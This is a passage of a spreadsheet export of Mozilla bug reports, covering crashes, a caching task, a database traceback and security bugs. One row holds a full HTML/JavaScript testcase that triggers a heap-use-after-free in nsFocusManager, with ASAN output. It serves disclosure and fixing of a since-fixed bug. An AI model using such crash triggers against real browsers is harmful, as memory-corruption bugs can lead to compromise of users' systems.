          <t>FIXED</t>
        </is>
      </c>
      <c r="P1484" t="inlineStr"/>
      <c r="Q1484" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1484" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1484" t="inlineStr">
        <is>
          <t>M7</t>
        </is>
      </c>
      <c r="T1484" t="n">
        <v>1</v>
      </c>
      <c r="U1484" t="n">
        <v>0</v>
      </c>
      <c r="V1484" t="n">
        <v>13</v>
      </c>
      <c r="W1484" t="inlineStr">
        <is>
          <t>Linux (1999-06-17-08 m7)
1. run apprunner
2. Core dump immediately occurs.
stack trace:
#0  0x403c26cb in _PR_InitCPUs ()
#1  0x403c3cbc in _PR_NativeRunThread ()</t>
        </is>
      </c>
      <c r="X1484" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1485">
      <c r="A1485" t="n">
        <v>1178240</v>
      </c>
      <c r="B1485" t="inlineStr">
        <is>
          <t>2015-06-29 03:22:44 -0700</t>
        </is>
      </c>
      <c r="C1485" t="inlineStr">
        <is>
          <t>Cache previously seen builds-{pending,running,4hr} jobs to avoid continual re-ingestion</t>
        </is>
      </c>
      <c r="D1485" t="inlineStr">
        <is>
          <t>2015-07-24 09:57:52 -0700</t>
        </is>
      </c>
      <c r="E1485" t="n">
        <v>1</v>
      </c>
      <c r="F1485" t="n">
        <v>1</v>
      </c>
      <c r="G1485" t="n">
        <v>7</v>
      </c>
      <c r="H1485" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1485" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1485" t="inlineStr">
        <is>
          <t>Treeherder: Data Ingestion</t>
        </is>
      </c>
      <c r="K1485" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1485" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1485" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1485" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1485" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1485" t="inlineStr"/>
      <c r="Q1485" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1485" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1485" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1485" t="n">
        <v>1</v>
      </c>
      <c r="U1485" t="n">
        <v>0</v>
      </c>
      <c r="V1485" t="n">
        <v>11</v>
      </c>
      <c r="W1485" t="inlineStr">
        <is>
          <t>We can store the request_id for builds_pending and the build_id for running/4hr to avoid continually re-ingesting them, significantly reducing churn on the database.</t>
        </is>
      </c>
      <c r="X1485" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1486">
      <c r="A1486" t="n">
        <v>448329</v>
      </c>
      <c r="B1486" t="inlineStr">
        <is>
          <t>2008-07-28 16:41:19 -0700</t>
        </is>
      </c>
      <c r="C1486" t="inlineStr">
        <is>
          <t>Browser crashes after hitting the "tab" key within Smatermail webmail app [@ nsHTMLEditor::GetCSSBackgroundColorState]</t>
        </is>
      </c>
      <c r="D1486" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E1486" t="n">
        <v>1</v>
      </c>
      <c r="F1486" t="n">
        <v>1</v>
      </c>
      <c r="G1486" t="n">
        <v>3</v>
      </c>
      <c r="H1486" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1486" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1486" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K1486" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1486" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1486" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1486" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1486" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1486" t="inlineStr">
        <is>
          <t>[sg:dos] null-pointer access</t>
        </is>
      </c>
      <c r="Q1486" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1486" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1486" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1486" t="n">
        <v>1</v>
      </c>
      <c r="U1486" t="n">
        <v>2</v>
      </c>
      <c r="V1486" t="n">
        <v>28</v>
      </c>
      <c r="W1486" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.1) Gecko/2008071717 Firefox/3.0.1
Build Identifier: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.1) Gecko/2008071717 Firefox/3.0.1
I've experienced a crash 100% time whenever I hit the "tab" key whenever I am composing an e-mail message from my server's webmail interface.  
The mail server is SmarterMail 5 available at www.smartertools.com.  I've been able to determine that the "tab" key seems to be a good synonym for the "crash" key while I'm typing an e-mail.  Everytime, Firefox just closes out completely whenever I forget and hit "tab".
Reproducible: Always
Steps to Reproduce:
1.  Compose New E-mail
2.  Hit tab in the body of the message
Actual Results:  
Firefox shuts down and does not display any kind of error message.
Expected Results:  
Hope that I would notice 5 spaces rather than a crash
If anyone needs temporary access to my mail server to see if they can reproduce the problem, I can set up a temporary account with limited access so you can access the webmail interface.</t>
        </is>
      </c>
      <c r="X1486" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1487">
      <c r="A1487" t="n">
        <v>732951</v>
      </c>
      <c r="B1487" t="inlineStr">
        <is>
          <t>2012-03-05 06:40:18 -0800</t>
        </is>
      </c>
      <c r="C1487" t="inlineStr">
        <is>
          <t>EnsureMutable() returns true (success) even when it failed due to OOM</t>
        </is>
      </c>
      <c r="D1487" t="inlineStr">
        <is>
          <t>2012-05-18 13:25:56 -0700</t>
        </is>
      </c>
      <c r="E1487" t="n">
        <v>1</v>
      </c>
      <c r="F1487" t="n">
        <v>1</v>
      </c>
      <c r="G1487" t="n">
        <v>3</v>
      </c>
      <c r="H1487" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1487" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1487" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K1487" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1487" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1487" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1487" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1487" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1487" t="inlineStr">
        <is>
          <t>[sg:critical][qa-]</t>
        </is>
      </c>
      <c r="Q1487" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1487" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1487" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T1487" t="n">
        <v>1</v>
      </c>
      <c r="U1487" t="n">
        <v>0</v>
      </c>
      <c r="V1487" t="n">
        <v>44</v>
      </c>
      <c r="W1487" t="inlineStr">
        <is>
          <t>Tested on m-c revision 8ea5c983743f: I don't know exactly what's wrong here, but the OOM condition as indicated by the allocation trace below (after crash trace), led to this crash which looks potentially dangerous:
Program received signal SIGSEGV, Segmentation fault.
nsContentUtils::ASCIIToLower (aStr=...) at /srv/repos/browser/mozilla-central/content/base/src/nsContentUtils.cpp:5042
5042        PRUnichar c = *iter;
(gdb) bt 8
#0  nsContentUtils::ASCIIToLower (aStr=...) at /srv/repos/browser/mozilla-central/content/base/src/nsContentUtils.cpp:5042
#1  0x00002aaaac77f6b0 in RuleHash_CIHashKey (table=&lt;optimized out&gt;, key=&lt;optimized out&gt;) at /srv/repos/browser/mozilla-central/layout/style/nsCSSRuleProcessor.cpp:166
#2  0x00002aaaad249529 in PL_DHashTableOperate (table=0x2bde9d8, key=0x22bae90, op=PL_DHASH_ADD)
    at /srv/repos/browser/mozilla-central/objdir-ff-gcc64dbg/xpcom/build/pldhash.cpp:615
#3  0x00002aaaac780659 in RuleHash::AppendRuleToTable (this=0x2bde9a0, aTable=&lt;optimized out&gt;, aKey=&lt;optimized out&gt;, aRuleInfo=...)
    at /srv/repos/browser/mozilla-central/layout/style/nsCSSRuleProcessor.cpp:566
#4  0x00002aaaac780745 in RuleHash::AppendRule (this=0x2bde9a0, aRuleInfo=...) at /srv/repos/browser/mozilla-central/layout/style/nsCSSRuleProcessor.cpp:610
#5  0x00002aaaac783648 in AddRule (aCascade=0x2bde9a0, aRuleInfo=0x2446cf0) at /srv/repos/browser/mozilla-central/layout/style/nsCSSRuleProcessor.cpp:2808
#6  RefreshRuleCascade (aPresContext=&lt;optimized out&gt;, this=0x27ef130) at /srv/repos/browser/mozilla-central/layout/style/nsCSSRuleProcessor.cpp:3148
#7  nsCSSRuleProcessor::RefreshRuleCascade (this=0x27ef130, aPresContext=&lt;optimized out&gt;) at /srv/repos/browser/mozilla-central/layout/style/nsCSSRuleProcessor.cpp:3095
(gdb) l
5037    nsContentUtils::ASCIIToLower(nsAString&amp; aStr)
5038    {
5039      PRUnichar* iter = aStr.BeginWriting();
5040      PRUnichar* end = aStr.EndWriting();
5041      while (iter != end) {
5042        PRUnichar c = *iter;
5043        if (c &gt;= 'A' &amp;&amp; c &lt;= 'Z') {
5044          *iter = c + ('a' - 'A');
5045        }
5046        ++iter;
(gdb) p iter
$1 = (PRUnichar *) 0x2aaaae4b3000
(gdb) p *iter
Cannot access memory at address 0x2aaaae4b3000
(gdb) p end        
$2 = (PRUnichar *) 0x7fffffffa4a0
The backtrace of the failing allocation is as follows:
#0 /srv/repos/browser/mozilla-central/objdir-ff-gcc64dbg/dist/bin/libmozalloc.so(moz_malloc+0x5f)
#1 nsStringBuffer::Alloc(unsigned long) at xpcom/string/src/nsSubstring.cpp:210
#2 nsAString_internal::MutatePrep(unsigned int, unsigned short**, unsigned int*) at xpcom/string/src/nsTSubstring.cpp:163
#3 nsAString_internal::ReplacePrepInternal(unsigned int, unsigned int, unsigned int, unsigned int) at xpcom/string/src/nsTSubstring.cpp:199
#4 nsAString_internal::Assign(unsigned short const*, unsigned int) at xpcom/string/src/nsTSubstring.cpp:335
#5 nsAString_internal::Assign(unsigned short const*, unsigned int) at xpcom/string/src/nsTSubstring.cpp:331
#6 nsAString_internal::EnsureMutable(unsigned int) at xpcom/string/src/nsTSubstring.cpp:295
#7 nsAString_internal::BeginWriting() at objdir-ff-gcc64dbg/content/base/src/../../../dist/include/nsTSubstring.h:159
#8 nsContentUtils::ASCIIToLower(nsAString_internal&amp;) at content/base/src/nsContentUtils.cpp:5040
#9 RuleHash_CIHashKey at layout/style/nsCSSRuleProcessor.cpp:167
#10 PL_DHashTableOperate at objdir-ff-gcc64dbg/xpcom/build/pldhash.cpp:616
#11 AddSelector at layout/style/nsCSSRuleProcessor.cpp:2742
#12 AddRule at layout/style/nsCSSRuleProcessor.cpp:2848
#13 nsCSSRuleProcessor::GetRuleCascade(nsPresContext*) at layout/style/nsCSSRuleProcessor.cpp:3089
#14 nsCSSRuleProcessor::RulesMatching(AnonBoxRuleProcessorData*) at layout/style/nsCSSRuleProcessor.cpp:2320
#15 EnumRulesMatching&lt;AnonBoxRuleProcessorData&gt; at layout/style/nsStyleSet.cpp:479
If you need longer traces, more GDB information or a reproduction of this, let me know. Guessing Layout as component, but not sure about that of course.</t>
        </is>
      </c>
      <c r="X1487" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1488">
      <c r="A1488" t="n">
        <v>1567327</v>
      </c>
      <c r="B1488" t="inlineStr">
        <is>
          <t>2019-07-18 15:34:52 -0700</t>
        </is>
      </c>
      <c r="C1488" t="inlineStr">
        <is>
          <t>Assertion failure: !used(), at js/src/jit/Label.h:86 with Baseline Interpreter</t>
        </is>
      </c>
      <c r="D1488" t="inlineStr">
        <is>
          <t>2019-12-02 06:31:37 -0800</t>
        </is>
      </c>
      <c r="E1488" t="n">
        <v>1</v>
      </c>
      <c r="F1488" t="n">
        <v>1</v>
      </c>
      <c r="G1488" t="n">
        <v>3</v>
      </c>
      <c r="H1488" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1488" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1488" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1488" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1488" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1488" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1488" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1488" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1488" t="inlineStr">
        <is>
          <t>[jsbugmon:update]</t>
        </is>
      </c>
      <c r="Q1488" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1488" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1488" t="inlineStr">
        <is>
          <t>mozilla72</t>
        </is>
      </c>
      <c r="T1488" t="n">
        <v>1</v>
      </c>
      <c r="U1488" t="n">
        <v>0</v>
      </c>
      <c r="V1488" t="n">
        <v>10</v>
      </c>
      <c r="W1488" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 0b014ee5cd51 (build with --enable-debug --enable-simulator=arm64, run with --fuzzing-safe --wasm-compiler=ion --test-wasm-await-tier2 --no-sse4 --ion-optimization-levels=off --ion-full-warmup-threshold=1500 --ion-instruction-reordering=on --ion-warmup-threshold=0 --ion-check-range-analysis --ion-range-analysis=off --ion-edgecase-analysis=on --ion-osr=off --ion-gvn=off --blinterp --blinterp-eager --more-compartments --no-streams --spectre-mitigations=on --gc-zeal=25,378):
    See attachment.
Backtrace:
```
#0  js::jit::Label::~Label (this=&lt;optimized out&gt;) at js/src/jit/Label.h:86
#1  js::jit::BaselineCodeGen&lt;js::jit::BaselineInterpreterHandler&gt;::emitDebugInstrumentation&lt;js::jit::BaselineCodeGen&lt;js::jit::BaselineInterpreterHandler&gt;::emit_JSOP_RECREATELEXICALENV()::{lambda()#1}, js::jit::BaselineCodeGen&lt;js::jit::BaselineInterpreterHandler&gt;::emit_JSOP_RECREATELEXICALENV()::{lambda()#2}&gt;(js::jit::BaselineCodeGen&lt;js::jit::BaselineInterpreterHandler&gt;::emit_JSOP_RECREATELEXICALENV()::{lambda()#1} const&amp;, mozilla::Maybe&lt;js::jit::BaselineCodeGen&lt;js::jit::BaselineInterpreterHandler&gt;::emit_JSOP_RECREATELEXICALENV()::{lambda()#2}&gt; const&amp;) (this=0x7fa1b78ac5d8, ifDebuggee=..., ifNotDebuggee=...) at js/src/jit/BaselineCompiler.cpp:4983
/snip
```
For detailed crash information, see attachment.
This is very hard to reproduce and to reduce, most of the time other Assertion failures involving [unhandlable oom] pop up instead. (Be sure to set the top of the testcase to your m-c repo dir) This likely happened after turning on fuzzing Baseline Interpreter, so setting needinfo? from Jan as a start.</t>
        </is>
      </c>
      <c r="X1488" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1489">
      <c r="A1489" t="n">
        <v>906939</v>
      </c>
      <c r="B1489" t="inlineStr">
        <is>
          <t>2013-08-19 16:36:25 -0700</t>
        </is>
      </c>
      <c r="C1489" t="inlineStr">
        <is>
          <t>[traceback] IntegrityError: (1062, "Duplicate entry ... - Collections cannot be saved</t>
        </is>
      </c>
      <c r="D1489" t="inlineStr">
        <is>
          <t>2013-08-21 10:31:23 -0700</t>
        </is>
      </c>
      <c r="E1489" t="n">
        <v>1</v>
      </c>
      <c r="F1489" t="n">
        <v>1</v>
      </c>
      <c r="G1489" t="n">
        <v>6</v>
      </c>
      <c r="H1489" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1489" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J1489" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1489" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L1489" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1489" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1489" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1489" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1489" t="inlineStr">
        <is>
          <t>[qa-]</t>
        </is>
      </c>
      <c r="Q1489" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1489" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1489" t="inlineStr">
        <is>
          <t>2013-08-20</t>
        </is>
      </c>
      <c r="T1489" t="n">
        <v>1</v>
      </c>
      <c r="U1489" t="n">
        <v>0</v>
      </c>
      <c r="V1489" t="n">
        <v>2</v>
      </c>
      <c r="W1489" t="inlineStr">
        <is>
          <t>Can reproduce locally. As reproduced on -dev:
    &gt;&gt;&gt; Collection
    &lt;class 'mkt.collections.models.Collection'&gt;
    &gt;&gt;&gt; Collection.objects.all()[0]
    &lt;Collection: lhwfdlvkfhv&gt;
    &gt;&gt;&gt; c=Collection.objects.all()[0]
    &gt;&gt;&gt; c.save()
    Traceback (most recent call last):
      File "&lt;console&gt;", line 1, in &lt;module&gt;
      File "/data/addons-dev/www/addons-dev.allizom.org/deploy-zamboni-dev-20130819151712-55e2ed4f79/venv/lib/python2.6/site-packages/django/db/models/base.py", line 463, in save
        self.save_base(using=using, force_insert=force_insert, force_update=force_update)
      File "/data/addons-dev/www/addons-dev.allizom.org/deploy-zamboni-dev-20130819151712-55e2ed4f79/venv/lib/python2.6/site-packages/django/db/models/base.py", line 551, in save_base
        result = manager._insert([self], fields=fields, return_id=update_pk, using=using, raw=raw)
      File "/data/addons-dev/www/addons-dev.allizom.org/deploy-zamboni-dev-20130819151712-55e2ed4f79/venv/lib/python2.6/site-packages/django/db/models/manager.py", line 203, in _insert
        return insert_query(self.model, objs, fields, **kwargs)
      File "/data/addons-dev/www/addons-dev.allizom.org/deploy-zamboni-dev-20130819151712-55e2ed4f79/venv/lib/python2.6/site-packages/django/db/models/query.py", line 1593, in insert_query
        return query.get_compiler(using=using).execute_sql(return_id)
      File "/data/addons-dev/www/addons-dev.allizom.org/deploy-zamboni-dev-20130819151712-55e2ed4f79/venv/lib/python2.6/site-packages/django/db/models/sql/compiler.py", line 912, in execute_sql
        cursor.execute(sql, params)
      File "/data/addons-dev/www/addons-dev.allizom.org/deploy-zamboni-dev-20130819151712-55e2ed4f79/venv/lib/python2.6/site-packages/django/db/backends/mysql/base.py", line 114, in execute
        return self.cursor.execute(query, args)
      File "/data/addons-dev/www/addons-dev.allizom.org/deploy-zamboni-dev-20130819151712-55e2ed4f79/venv/lib/python2.6/site-packages/newrelic-1.11.0.55/newrelic/hooks/database_dbapi2.py", line 32, in execute
        return self._nr_cursor.execute(sql, *args, **kwargs)
      File "/usr/lib64/python2.6/site-packages/MySQLdb/cursors.py", line 173, in execute
        self.errorhandler(self, exc, value)
      File "/usr/lib64/python2.6/site-packages/MySQLdb/connections.py", line 36, in defaulterrorhandler
        raise errorclass, errorvalue
    IntegrityError: (1062, "Duplicate entry '37' for key 'PRIMARY'")</t>
        </is>
      </c>
      <c r="X1489" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1490">
      <c r="A1490" t="n">
        <v>1349946</v>
      </c>
      <c r="B1490" t="inlineStr">
        <is>
          <t>2017-03-23 08:04:03 -0700</t>
        </is>
      </c>
      <c r="C1490" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsFocusManager::CheckIfFocusable</t>
        </is>
      </c>
      <c r="D1490" t="inlineStr">
        <is>
          <t>2024-05-30 09:31:00 -0700</t>
        </is>
      </c>
      <c r="E1490" t="n">
        <v>1</v>
      </c>
      <c r="F1490" t="n">
        <v>1</v>
      </c>
      <c r="G1490" t="n">
        <v>3</v>
      </c>
      <c r="H1490" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1490" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1490" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1490" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1490" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1490" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1490" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1490" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1490" t="inlineStr">
        <is>
          <t>[adv-main53+][adv-esr52.1+][adv-esr45.9+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1490" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1490" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1490" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T1490" t="n">
        <v>1</v>
      </c>
      <c r="U1490" t="n">
        <v>0</v>
      </c>
      <c r="V1490" t="n">
        <v>16</v>
      </c>
      <c r="W1490" t="inlineStr">
        <is>
          <t>The following testcases crashes the latest ASAN build of Firefox (BuildID=20170322145832).
crash.html:
&lt;script&gt;
function start () {
    o2=document.createElementNS('http://www.w3.org/1999/xhtml','div');
    o8=document.createRange();
    o16=document.createElementNS('http://www.w3.org/1999/xhtml','input');
    o20=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
    o21=o8.cloneRange();
    o28=document.createElementNS('http://www.w3.org/1999/xhtml','strike');
    o36=document.createElementNS('http://www.w3.org/1999/xhtml','tfoot');
    o28.prepend("x","x","x");
    o37=document.createElementNS('http://www.w3.org/1999/xhtml','area');
    o28.appendChild(o2);
    o56=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
    o57=o2.previousSibling;
    o83=document.createElementNS('http://www.w3.org/1999/xhtml','input');
    o20.appendChild(o83);
    document.documentElement.appendChild(o28);
    o36.appendChild(o56);
    o21.setStartBefore(o57);
    o16.appendChild(o20);
    document.documentElement.innerHTML='';
    o21.surroundContents(o37);
    o276=document.createRange();
    o276.selectNode(o37);
    o303=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
    o83.appendChild(o303);
    o276.insertNode(o36);
    o56.contentWindow.onresize=fun0;
    o639=window.top.frames[0];
    o640=o639.document;
    o641=o640.documentElement;
    o645=window.top.frames[2];
    o703=document.createElementNS('http://www.w3.org/1999/xhtml','input');
    o703.type='number';
    o641.appendChild(o703);
    o703.focus();
}
function fun0() {
    document.documentElement.appendChild(o703);
    window.fuzzPriv.CC();
    window.fuzzPriv.CC();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==11515==ERROR: AddressSanitizer: heap-use-after-free on address 0x615000297cb0 at pc 0x7f3c5cb2be73 bp 0x7ffc1d1ee850 sp 0x7ffc1d1ee848
READ of size 4 at 0x615000297cb0 thread T0 (Web Content)
    #0 0x7f3c5cb2be72 in GetBoolFlag /home/worker/workspace/build/src/dom/base/nsINode.h:1596:12
    #1 0x7f3c5cb2be72 in IsInUncomposedDoc /home/worker/workspace/build/src/dom/base/nsINode.h:546
    #2 0x7f3c5cb2be72 in GetPrimaryFrame /home/worker/workspace/build/src/obj-firefox/dist/include/nsIContent.h:898
    #3 0x7f3c5cb2be72 in nsFocusManager::CheckIfFocusable(nsIContent*, unsigned int) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1570
    #4 0x7f3c5cb2adf7 in nsFocusManager::CheckIfFocusable(nsIContent*, unsigned int) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1542:12
    #5 0x7f3c5cb33801 in nsFocusManager::Focus(nsPIDOMWindowOuter*, nsIContent*, unsigned int, bool, bool, bool, bool, nsIContent*) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1898:7
    #6 0x7f3c5cb2959e in nsFocusManager::SetFocusInner(nsIContent*, int, bool, bool) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1354:5
    #7 0x7f3c5cb2a964 in nsFocusManager::SetFocus(nsIDOMElement*, unsigned int) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:486:3
    #8 0x7f3c5c8c8550 in mozilla::dom::Element::Focus(mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/Element.cpp:311:18
    #9 0x7f3c5ea0f4fe in mozilla::dom::HTMLInputElement::Focus(mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3504:27
    #10 0x7f3c5e0fc70b in mozilla::dom::HTMLElementBinding::focus(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGenericHTMLElement*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLElementBinding.cpp:462:9
    #11 0x7f3c5e3990be in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13
    #12 0x7f3c63b2fe23 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #13 0x7f3c63b2fe23 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
    #14 0x7f3c63b307d2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #15 0x7f3c6473b93e in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #16 0x7f3c646f2464 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #17 0x7f3c6471bee3 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:21
    #18 0x7f3c6471e847 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #19 0x7f3c63b30173 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #20 0x7f3c63b30173 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #21 0x7f3c63b18669 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
    #22 0x7f3c63b18669 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2998
    #23 0x7f3c63afe5ce in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #24 0x7f3c63b2ffa8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #25 0x7f3c63b307d2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #26 0x7f3c644ae4eb in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
    #27 0x7f3c5de3c2e5 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #28 0x7f3c5e79e74b in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #29 0x7f3c5e79e74b in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
